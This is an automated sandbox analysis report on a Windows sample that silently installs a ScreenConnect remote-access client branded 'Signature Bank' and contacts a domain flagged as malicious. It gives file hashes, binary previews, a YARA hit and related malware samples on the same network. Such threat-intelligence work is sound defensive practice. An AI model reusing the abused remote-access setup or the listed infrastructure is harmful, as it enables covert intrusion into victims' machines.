C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Windows\Installer\MSI5529.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI576D.tmp	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lokistorage.xyz	95.164.16.15	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://wixtoolset.org/releases/	rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
http://wixtoolset.org/news/	rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ScreenConnect.ClientService.exe, 00000008.00000002.2731727368.000000000198B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.00000000031DA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v	rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.3.dr	false	high
https://docs.rs/getrandom#nodejs-es-module-support	ScreenConnect.WindowsCredentialProvider.dll.3.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.164.16.15	lokistorage.xyz	Gibraltar		29632	NASSIST-ASGI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554618
Start date and time:	2024-11-12 18:39:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	H36NgltNe7.exe renamed because original name is a hash value
Original Sample Name:	2baad4cb8a8d6af1916b38237bb766c89c2bde59d555b73484722a48463d4a6f.exe
Detection:	MAL
Classification:	mal50.troj.evad.winEXE@17/65@1/1
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 64% Number of executed functions: 172 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target H36NgltNe7.exe, PID 6560 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 2868 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: H36NgltNe7.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NASSIST-ASGI	Josho.m68k.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	J5uGzpvcAa.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	nPRmTlXhOT.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	OwBugJ5CiC.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	H5LPetzgXV.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	4l9YKCc7qQ.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	mCR2IJsjgy.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	Josho.arm7.elf	Get hash	malicious	Mirai	Browse	95.164.4.65
	J3m5xLlT8D.exe	Get hash	malicious	DCRat	Browse	95.164.6.175
	na.elf	Get hash	malicious	Unknown	Browse	94.131.118.154

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	INSPECAO-B01S.msi	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\Config.Msi\6f527a.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	219648
Entropy (8bit):	6.581612777793765
Encrypted:	false
SSDEEP:	3072:M09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGd:M0uH2aCGw1ST1wQLdqvd
MD5:	0B76F22BFABF84895FD1EA63D632BB3D
SHA1:	97A5728823C62F33DCE1FCDAEED8023D1D428132
SHA-256:	C69C2F5576DA6EAF68047136FB35BBB084325D4EA96856ED0584A52C4922BCCE
SHA-512:	2812A7BEEA57986B2FF4D90FFEB06CC0541A9A56EBA90DFB71DFA8CCAD73934FF3352C88503BA2CF46C3D18B8E2978A89AD3946262214D88BF88AC4A8FC4C6A5
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\6f527a.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.Override.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	241
Entropy (8bit):	4.920230500734458
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
MD5:	E412586907C81C15CED17A120DE270B3
SHA1:	EE0E2EDE15DAD65285184C2044367CC6D20D8709
SHA-256:	0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
SHA-512:	CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.Override.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	169094
Entropy (8bit):	7.97364017646364
Encrypted:	false
SSDEEP:	3072:Q1BQsAtdZEVwx9whh71/ccEOCnJ8GEsuMNSWID4ygf8AuSJpKeza:QHQ96VwPYhx/cc9mJnEsu81Ln/Jwt
MD5:	DE75320C1124233901AA23C368595375
SHA1:	23A40D4AA2F1D71F819581F0EA9FEADA5ED234DA
SHA-256:	32EA2F66A6C8F4345C4AFF82465A5BB81588743CE8CBB25F6D4BEE90E28A00DB
SHA-512:	5FDC124BF5D9C30D13019D4326C91BD5FEEAF46F337C14F87A50E468B0AB8737F34180E8A4CE7B005B761B82ED100812E3B4C5C786AA21F3B8270733A462724B
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....H.....;...H...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.8... 3....PNG........IHDR.......8........C....sBIT....\|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx.....(.....'.....q..R. ...L.7.c..$H"..........A...d.k^.r.............u.....r$.......<..8.....O.....{..Xi6....F....P.........N,..I\|1..%7.v......X.n..r..5........H..4.GK.~?.9.@K/.+....s=.4Y..-~...;ge..E_Htd..C..../..!.'o...n.6.....jiG`G.~.v........4YJ<g.g...s.....k$...ki{.)..8....AX.X.-..(...f.'..H...5.....\|.O....t........p.K....x..y......d.$nx........1...z...U./..:j...u..^..oz..^K.[.-!.........t..m.t..$O........H....h..$..(....;V....t..B.u.f...K...HHS.y....~,.U:Q...D\|.....,v..x..n.7..>x".H.z.p..5.:WR>..46.&..4....u..

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	49959
Entropy (8bit):	4.758252520953682
Encrypted:	false
SSDEEP:	1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
MD5:	511202ED0BA32D7F09EAB394C917D067
SHA1:	DBD611720FD1730198F72DEC09E8E23E6D6488F8
SHA-256:	F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
SHA-512:	F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.595800276062395
Encrypted:	false
SSDEEP:	3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
MD5:	F311A8217807F6C85817058522E234A2
SHA1:	CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
SHA-256:	032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
SHA-512:	5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: INSPECAO-B01S.msi, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0................. ... ....... .......................`.......L....@.....................................O.... ..\|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=.....0...........~)...%-.&~(.....\|...s&...%.)...(...+..~...%-.&~(.....}...s(...%.*...(...+.r9..

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.081952570081618
Encrypted:	false
SSDEEP:	1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
MD5:	3FF07C657068430EF677181D1F67066D
SHA1:	37F7E9D2CCB65B4EA2733393015635EA1B43393E
SHA-256:	D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
SHA-512:	5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....j...s....%.,...(...+vs....%.}Q.........s....(........0...........s....}.....s....}...........}.......('.....}.....(....&.(..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505417048098125
Encrypted:	false
SSDEEP:	1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
MD5:	826314610D9E854477B08666330940B5
SHA1:	65B601D60042CF6F263CD38AC2F63CD06A9DE159
SHA-256:	E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
SHA-512:	5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	260168
Entropy (8bit):	6.416438906122177
Encrypted:	false
SSDEEP:	3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
MD5:	5ADCB5AE1A1690BE69FD22BDF3C2DB60
SHA1:	09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
SHA-256:	A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
SHA-512:	812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.316664164724877
Encrypted:	false
SSDEEP:	1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
MD5:	C1F206B0C0058DC4CC7B9F3125F61E20
SHA1:	541A1564799DA24C48BE188888F306381EF23728
SHA-256:	94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
SHA-512:	6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0................. ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....(".....0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
